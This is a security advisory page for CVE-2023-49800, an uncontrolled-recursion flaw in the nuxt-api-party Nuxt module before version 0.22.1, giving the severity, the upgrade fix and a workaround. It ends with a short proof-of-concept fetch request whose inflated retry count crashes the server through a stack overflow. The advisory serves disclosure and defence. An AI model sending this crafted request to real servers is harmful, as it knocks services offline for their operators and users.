Uncontrolled Recursion Affecting nuxt-api-party package, versions <0.22.1


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (23rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-NUXTAPIPARTY-6115221
  • published11 Dec 2023
  • disclosed9 Dec 2023
  • creditOhB00

Introduced: 9 Dec 2023

CVE-2023-49800  (opens in a new tab)
CWE-674  (opens in a new tab)

How to fix?

Upgrade nuxt-api-party to version 0.22.1 or higher.

Overview

nuxt-api-party is a Nuxt 3 module to securely connect with any API

Affected versions of this package are vulnerable to Uncontrolled Recursion due to an abuse on the retry logic in ofetch function. An attacker can cause the server to crash from a stack overflow by sending a crafted request with a high number of retry attempts for a URL known to fail.

Workaround

Limit which options can be passed to ofetch.

PoC


await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
    method: "POST",
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

CVSS Scores

version 3.1